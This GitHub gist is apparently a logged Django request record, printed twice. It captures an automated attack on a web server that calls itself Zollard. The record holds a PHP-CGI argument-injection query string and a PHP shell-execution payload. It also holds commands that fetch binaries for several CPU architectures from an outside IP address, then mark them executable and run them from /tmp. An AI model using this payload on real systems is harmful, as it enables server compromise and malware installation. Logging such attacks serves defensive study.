thisisthechris/gist:eb40c2df85f8dd2fb524

## gistfile1.txt
Request repr():
<WSGIRequest
path:/cgi-bin/php.cgi,
GET:<QueryDict: {u'-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n': [u'']}>,
POST:<QueryDict: {u'chmod  x /tmp/x86")': [u''], u'\n $disablefunc ':
[u' explode(",",$disablefunc)'], u'wget -P /tmp
http://178.234.62.207:58455/mips': [u''], u'<?php\necho "Zollard"':
[u''], u'chmod    x /tmp/sig")': [u''], u'\nmyshellexec("rm -rf
/tmp/sig': [u''], u'chmod  x /tmp/armeabi")': [u''], u'}\n  elseif
(($result ': [u' `$cmd`) !== FALSE) {}\n  elseif (is_callable("system")
and !in_array("system",$disablefunc)) {$v = @ob_get_contents()'],
u'chmod  x /tmp/mipsel")': [u''], u'\nif (!empty($disablefunc))\n{\n
$disablefunc ': [u' str_replace(" ","",$disablefunc)'], u'
passthru($cmd)': [u''], u'\nmyshellexec("rm -rf /tmp/mips': [u''],
u'chmod  x /tmp/arm")': [u''], u'\n$disablefunc ': [u'
@ini_get("disable_functions")'], u'\nmyshellexec("rm -rf /tmp/x86':
[u''], u'wget -P /tmp http://178.234.62.207:58455/x86': [u''], u'
system($cmd)': [u''], u'\nmyshellexec("rm -rf /tmp/nodes': [u''], u'\n
$result ': [u' ""'], u'\nmyshellexec("rm -rf /tmp/mipsel': [u''],
u'chmod  x /tmp/ppc")': [u''], u'\n?>': [u''], u'\n  }\n }\n return
$result': [u''], u'\n}\nfunction myshellexec($cmd)\n{\n global
$disablefunc': [u''], u'/tmp/ppc': [u''], u'chmod  x /tmp/nodes")':
[u''], u'")': [u''], u' $result ': [u' join("\\n",$result)', u'
@ob_get_contents()', u' @ob_get_contents()'], u'chmod  x /tmp/mips")':
[u''], u'\n}\nmyshellexec("rm -rf /tmp/armeabi': [u''], u'wget -P /tmp
http://178.234.62.207:58455/nodes': [u''], u'/tmp/mipsel': [u''],
u'/tmp/mips': [u''], u'}\n  elseif (is_callable("passthru") and
!in_array("passthru",$disablefunc)) {$v ': [u' @ob_get_contents()'],
u'wget -P /tmp http://178.234.62.207:58455/arm': [u''], u'/tmp/x86':
[u''], u'wget -P /tmp http://178.234.62.207:58455/ppc': [u''], u'\n if
(!empty($cmd))\n {\n  if (is_callable("exec") and
!in_array("exec",$disablefunc)) {exec($cmd,$result)': [u''], u'wget -P
/tmp http://178.234.62.207:58455/armeabi': [u''], u'\n
while(!feof($fp)) {$result .': [u' fread($fp,1024)'], u'wget -P /tmp
http://178.234.62.207:58455/mipsel': [u''], u'}\n  elseif
(is_resource($fp ': [u' popen($cmd,"r")))\n  {\n   $result = ""'],
u'\nmyshellexec("rm -rf /tmp/ppc': [u''], u'wget -P /tmp
http://178.234.62.207:58455/sig': [u''], u' echo $v': [u'', u''],
u'\nmyshellexec("/tmp/armeabi': [u''], u'/tmp/arm': [u''], u'
@ob_clean()': [u'', u'', u'', u''], u'}\n   pclose($fp)': [u''],
u'\nmyshellexec("rm -rf /tmp/arm': [u'']}>,
COOKIES:{},
META:{'CONTENT_LENGTH': '1825',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'HTTP_CONNECTION': 'close',
'HTTP_HOST': '146.185.175.141',
'HTTP_USER_AGENT': 'Mozilla/5.0 (compatible; Zollard; Linux)',
'HTTP_X_FORWARDED_FOR': '178.234.62.207',
'HTTP_X_REAL_IP': '178.234.62.207',
'PATH_INFO': u'/cgi-bin/php.cgi',
'QUERY_STRING': '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E',
'REMOTE_ADDR': '178.234.62.207',
'REQUEST_METHOD': 'POST',
'SCRIPT_NAME': u'',
'SERVER_NAME': '146.185.175.141',
'SERVER_PORT': '80',
'SERVER_PROTOCOL': 'HTTP/1.0',
'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f83bdda3270>,
'wsgi.input': <_io.BytesIO object at 0x2563530>,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
'wsgi.url_scheme': 'http',
'wsgi.version': (1, 0)}>
	Request repr():
	<WSGIRequest
	path:/cgi-bin/php.cgi,
	GET:<QueryDict: {u'-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n': [u'']}>,
	POST:<QueryDict: {u'chmod x /tmp/x86")': [u''], u'\n $disablefunc ':
	[u' explode(",",$disablefunc)'], u'wget -P /tmp
	http://178.234.62.207:58455/mips': [u''], u'<?php\necho "Zollard"':
	[u''], u'chmod x /tmp/sig")': [u''], u'\nmyshellexec("rm -rf
	/tmp/sig': [u''], u'chmod x /tmp/armeabi")': [u''], u'}\n elseif
	(($result ': [u' `$cmd`) !== FALSE) {}\n elseif (is_callable("system")
	and !in_array("system",$disablefunc)) {$v = @ob_get_contents()'],
	u'chmod x /tmp/mipsel")': [u''], u'\nif (!empty($disablefunc))\n{\n
	$disablefunc ': [u' str_replace(" ","",$disablefunc)'], u'
	passthru($cmd)': [u''], u'\nmyshellexec("rm -rf /tmp/mips': [u''],
	u'chmod x /tmp/arm")': [u''], u'\n$disablefunc ': [u'
	@ini_get("disable_functions")'], u'\nmyshellexec("rm -rf /tmp/x86':
	[u''], u'wget -P /tmp http://178.234.62.207:58455/x86': [u''], u'
	system($cmd)': [u''], u'\nmyshellexec("rm -rf /tmp/nodes': [u''], u'\n
	$result ': [u' ""'], u'\nmyshellexec("rm -rf /tmp/mipsel': [u''],
	u'chmod x /tmp/ppc")': [u''], u'\n?>': [u''], u'\n }\n }\n return
	$result': [u''], u'\n}\nfunction myshellexec($cmd)\n{\n global
	$disablefunc': [u''], u'/tmp/ppc': [u''], u'chmod x /tmp/nodes")':
	[u''], u'")': [u''], u' $result ': [u' join("\\n",$result)', u'
	@ob_get_contents()', u' @ob_get_contents()'], u'chmod x /tmp/mips")':
	[u''], u'\n}\nmyshellexec("rm -rf /tmp/armeabi': [u''], u'wget -P /tmp
	http://178.234.62.207:58455/nodes': [u''], u'/tmp/mipsel': [u''],
	u'/tmp/mips': [u''], u'}\n elseif (is_callable("passthru") and
	!in_array("passthru",$disablefunc)) {$v ': [u' @ob_get_contents()'],
	u'wget -P /tmp http://178.234.62.207:58455/arm': [u''], u'/tmp/x86':
	[u''], u'wget -P /tmp http://178.234.62.207:58455/ppc': [u''], u'\n if
	(!empty($cmd))\n {\n if (is_callable("exec") and
	!in_array("exec",$disablefunc)) {exec($cmd,$result)': [u''], u'wget -P
	/tmp http://178.234.62.207:58455/armeabi': [u''], u'\n
	while(!feof($fp)) {$result .': [u' fread($fp,1024)'], u'wget -P /tmp
	http://178.234.62.207:58455/mipsel': [u''], u'}\n elseif
	(is_resource($fp ': [u' popen($cmd,"r")))\n {\n $result = ""'],
	u'\nmyshellexec("rm -rf /tmp/ppc': [u''], u'wget -P /tmp
	http://178.234.62.207:58455/sig': [u''], u' echo $v': [u'', u''],
	u'\nmyshellexec("/tmp/armeabi': [u''], u'/tmp/arm': [u''], u'
	@ob_clean()': [u'', u'', u'', u''], u'}\n pclose($fp)': [u''],
	u'\nmyshellexec("rm -rf /tmp/arm': [u'']}>,
	COOKIES:{},
	META:{'CONTENT_LENGTH': '1825',
	'CONTENT_TYPE': 'application/x-www-form-urlencoded',
	'HTTP_CONNECTION': 'close',
	'HTTP_HOST': '146.185.175.141',
	'HTTP_USER_AGENT': 'Mozilla/5.0 (compatible; Zollard; Linux)',
	'HTTP_X_FORWARDED_FOR': '178.234.62.207',
	'HTTP_X_REAL_IP': '178.234.62.207',
	'PATH_INFO': u'/cgi-bin/php.cgi',
	'QUERY_STRING': '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E',
	'REMOTE_ADDR': '178.234.62.207',
	'REQUEST_METHOD': 'POST',
	'SCRIPT_NAME': u'',
	'SERVER_NAME': '146.185.175.141',
	'SERVER_PORT': '80',
	'SERVER_PROTOCOL': 'HTTP/1.0',
	'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f83bdda3270>,
	'wsgi.input': <_io.BytesIO object at 0x2563530>,
	'wsgi.multiprocess': True,
	'wsgi.multithread': False,
	'wsgi.run_once': False,
	'wsgi.url_scheme': 'http',
	'wsgi.version': (1, 0)}>